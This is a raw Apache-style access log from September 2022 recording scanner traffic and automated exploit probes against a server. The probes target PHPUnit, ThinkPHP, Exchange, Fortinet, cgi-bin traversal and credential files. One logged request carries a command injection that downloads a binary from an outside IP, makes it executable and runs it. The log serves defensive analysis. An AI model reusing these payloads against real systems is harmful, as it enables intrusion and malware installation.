23.251.102.74 - - [12/Sep/2022:03:17:58 +0200] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 74.82.47.5 - - [12/Sep/2022:04:13:01 +0200] "GET / HTTP/1.1" 301 383 "-" "-" 74.82.47.5 - - [12/Sep/2022:04:21:34 +0200] "GET /favicon.ico HTTP/1.1" 301 309 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36" 74.82.47.37 - - [12/Sep/2022:04:26:52 +0200] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0" 152.89.196.211 - - [12/Sep/2022:04:41:05 +0200] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 152.89.196.211 - - [12/Sep/2022:04:45:08 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 92.118.39.86 - - [12/Sep/2022:05:15:48 +0200] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (compatible, MSIE 10.0, Windows NT, DigExt)" 192.241.217.165 - - [12/Sep/2022:05:32:53 +0200] "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 301 335 "-" "Mozilla/5.0 zgrab/0.x" 152.89.196.211 - - [12/Sep/2022:05:39:41 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 301 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 193.106.29.122 - - [12/Sep/2022:05:40:09 +0200] "GET / HTTP/1.0" 301 388 "-" "Mozilla/5.0" 152.89.196.211 - - [12/Sep/2022:06:57:35 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 301 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 152.89.196.211 - - [12/Sep/2022:07:13:21 +0200] "POST /mifs/.;/services/LogService HTTP/1.1" 301 318 "https://86.59.113.102:443" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 92.255.85.183 - - [12/Sep/2022:07:31:58 +0200] "-" 408 - "-" "-" 152.89.196.211 - - [12/Sep/2022:07:46:20 +0200] "GET /console/ HTTP/1.1" 301 307 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 152.89.196.211 - - [12/Sep/2022:08:26:28 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 301 315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 152.89.196.211 - - [12/Sep/2022:09:13:36 +0200] "GET /_ignition/execute-solution HTTP/1.1" 301 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 192.241.219.168 - - [12/Sep/2022:09:15:40 +0200] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 zgrab/0.x" 128.14.141.34 - - [12/Sep/2022:09:23:52 +0200] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 152.89.196.211 - - [12/Sep/2022:09:56:56 +0200] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 192.241.208.55 - - [12/Sep/2022:10:10:39 +0200] "GET /owa/auth/logon.aspx HTTP/1.1" 301 314 "-" "Mozilla/5.0 zgrab/0.x" 192.241.209.41 - - [12/Sep/2022:10:13:48 +0200] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 348 "-" "Mozilla/5.0 zgrab/0.x" 192.241.208.175 - - [12/Sep/2022:10:16:03 +0200] "GET /owa/auth/x.js HTTP/1.1" 301 310 "-" "Mozilla/5.0 zgrab/0.x" 185.142.236.41 - - [12/Sep/2022:10:18:05 +0200] "GET / HTTP/1.1" 301 383 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36" 185.142.236.41 - - [12/Sep/2022:10:18:14 +0200] "" 400 379 "-" "-" 185.142.236.41 - - [12/Sep/2022:10:18:15 +0200] "" 400 379 "-" "-" 185.142.236.41 - - [12/Sep/2022:10:18:15 +0200] "" 400 379 "-" "-" 185.142.236.41 - - [12/Sep/2022:10:18:20 +0200] "quit" 400 379 "-" "-" 185.142.236.41 - - [12/Sep/2022:10:18:21 +0200] "GET /robots.txt HTTP/1.1" 301 393 "-" "-" 185.142.236.41 - - [12/Sep/2022:10:18:22 +0200] "GET /sitemap.xml HTTP/1.1" 301 394 "-" "-" 185.142.236.41 - - [12/Sep/2022:10:18:23 +0200] "GET /.well-known/security.txt HTTP/1.1" 301 407 "-" "-" 185.142.236.41 - - [12/Sep/2022:10:18:25 +0200] "GET /favicon.ico HTTP/1.1" 301 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0" 185.142.236.41 - - [12/Sep/2022:10:18:26 +0200] "" 400 379 "-" "-" 152.89.196.211 - - [12/Sep/2022:10:21:16 +0200] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 128.14.133.58 - - [12/Sep/2022:11:02:41 +0200] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 88.214.43.118 - - [12/Sep/2022:11:19:35 +0200] "GET /.aws/credentials.php HTTP/1.1" 301 320 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 88.214.43.118 - - [12/Sep/2022:11:19:36 +0200] "POST /.aws/credentials.php HTTP/1.1" 301 320 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 185.220.100.241 - - [12/Sep/2022:11:28:06 +0200] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 152.89.196.211 - - [12/Sep/2022:11:46:17 +0200] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 152.89.196.211 - - [12/Sep/2022:12:23:59 +0200] "-" 408 - "-" "-" 165.22.229.152 - - [12/Sep/2022:12:33:06 +0200] "GET /ab2g HTTP/1.1" 301 304 "-" "Mozilla/5.0 zgrab/0.x" 165.22.229.152 - - [12/Sep/2022:12:33:09 +0200] "GET /ab2h HTTP/1.1" 301 304 "-" "Mozilla/5.0 zgrab/0.x" 71.6.232.8 - - [12/Sep/2022:12:33:53 +0200] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" 152.89.196.23 - - [12/Sep/2022:13:26:06 +0200] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 301 452 "-" "Python-urllib/3.8" 218.145.61.20 - - [12/Sep/2022:14:20:31 +0200] "-" 408 - "-" "-" 92.118.39.86 - - [12/Sep/2022:15:03:21 +0200] "GET /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0Acd+%2Ftmp%3Bwget+http%3A%2F%2F198.98.49.79%2Fdeathtrump.i686%3Bchmod+777+deathtrump.i686%3B.%2Fdeathtrump.i686%0A' HTTP/1.1" 301 424 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" 152.32.143.177 - - [12/Sep/2022:15:08:06 +0200] "GET / HTTP/1.1" 301 383 "-" "curl/7.29.0" 128.14.209.162 - - [12/Sep/2022:17:53:23 +0200] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 152.89.196.211 - - [12/Sep/2022:18:36:13 +0200] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 43.205.95.5 - - [12/Sep/2022:19:04:45 +0200] "GET /.git/config HTTP/1.1" 301 310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36" 152.89.196.211 - - [12/Sep/2022:19:35:48 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 301 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 152.89.196.211 - - [12/Sep/2022:19:48:00 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 301 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 20.92.162.191 - - [12/Sep/2022:20:41:34 +0200] "GET /.git/config HTTP/1.1" 301 310 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0" 152.89.196.211 - - [12/Sep/2022:21:00:55 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 301 315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 193.235.141.177 - - [12/Sep/2022:21:01:27 +0200] "GET / HTTP/1.1" 301 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" 51.171.238.35 - - [12/Sep/2022:21:02:51 +0200] "GET / HTTP/1.1" 301 295 "-" "Viber" 128.1.248.42 - - [12/Sep/2022:21:13:51 +0200] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 185.180.143.7 - - [12/Sep/2022:21:15:58 +0200] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 152.89.196.211 - - [12/Sep/2022:21:28:20 +0200] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 152.89.196.211 - - [12/Sep/2022:22:03:22 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 203.122.46.42 - - [12/Sep/2022:22:23:13 +0200] "-" 408 - "-" "-" 152.89.196.211 - - [12/Sep/2022:22:26:59 +0200] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 152.89.196.211 - - [12/Sep/2022:22:30:55 +0200] "GET /actuator/gateway/routes HTTP/1.1" 301 315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 205.210.31.55 - - [12/Sep/2022:22:33:14 +0200] "GET / HTTP/1.1" 301 379 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 35.87.112.32 - - [12/Sep/2022:23:11:22 +0200] "GET / HTTP/1.1" 301 307 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 54.188.158.76 - - [12/Sep/2022:23:11:57 +0200] "GET /favicon.ico HTTP/1.1" 301 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 54.188.158.76 - - [12/Sep/2022:23:12:02 +0200] "GET / HTTP/1.1" 301 307 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 47.243.233.244 - - [12/Sep/2022:23:52:00 +0200] "GET /dns-query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1" 301 343 "-" "Go-http-client/1.1" 47.243.233.244 - - [12/Sep/2022:23:52:04 +0200] "GET /dns-query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1" 301 343 "-" "Go-http-client/1.1" 47.243.233.244 - - [12/Sep/2022:23:52:06 +0200] "POST /dns-query HTTP/1.1" 301 308 "-" "Go-http-client/1.1" 47.243.233.244 - - [12/Sep/2022:23:52:08 +0200] "POST /dns-query HTTP/1.1" 301 308 "-" "Go-http-client/1.1" 47.243.233.244 - - [12/Sep/2022:23:52:11 +0200] "GET /query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1" 301 340 "-" "Go-http-client/1.1" 47.243.233.244 - - [12/Sep/2022:23:52:13 +0200] "GET /query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1" 301 340 "-" "Go-http-client/1.1" 47.243.233.244 - - [12/Sep/2022:23:52:15 +0200] "POST /query HTTP/1.1" 301 305 "-" "Go-http-client/1.1" 47.243.233.244 - - [12/Sep/2022:23:52:18 +0200] "POST /query HTTP/1.1" 301 305 "-" "Go-http-client/1.1" 47.243.233.244 - - [12/Sep/2022:23:52:20 +0200] "GET /resolve?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1" 301 342 "-" "Go-http-client/1.1" 47.243.233.244 - - [12/Sep/2022:23:52:22 +0200] "GET /resolve?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1" 301 342 "-" "Go-http-client/1.1" 47.243.233.244 - - [12/Sep/2022:23:52:25 +0200] "POST /resolve HTTP/1.1" 301 305 "-" "Go-http-client/1.1" 47.243.233.244 - - [12/Sep/2022:23:52:28 +0200] "POST /resolve HTTP/1.1" 301 305 "-" "Go-http-client/1.1" 47.243.233.244 - - [12/Sep/2022:23:52:29 +0200] "GET /?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1" 301 337 "-" "Go-http-client/1.1" 47.243.233.244 - - [12/Sep/2022:23:52:32 +0200] "GET /?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1" 301 337 "-" "Go-http-client/1.1" 47.243.233.244 - - [12/Sep/2022:23:52:34 +0200] "POST / HTTP/1.1" 301 301 "-" "Go-http-client/1.1" 47.243.233.244 - - [12/Sep/2022:23:52:36 +0200] "POST / HTTP/1.1" 301 301 "-" "Go-http-client/1.1" 205.210.31.23 - - [12/Sep/2022:23:57:48 +0200] "GET / HTTP/1.1" 301 377 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 69.146.0.194 - - [13/Sep/2022:00:19:06 +0200] "GET /autodiscover/autodiscover.json?@foo.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3f@foo.com HTTP/1.1" 301 353 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" 128.14.209.162 - - [13/Sep/2022:00:23:13 +0200] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 34.76.96.55 - - [13/Sep/2022:00:49:53 +0200] "GET / HTTP/1.1" 301 301 "-" "python-requests/2.28.1" 94.102.61.8 - - [13/Sep/2022:01:06:51 +0200] "GET / HTTP/1.1" 301 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"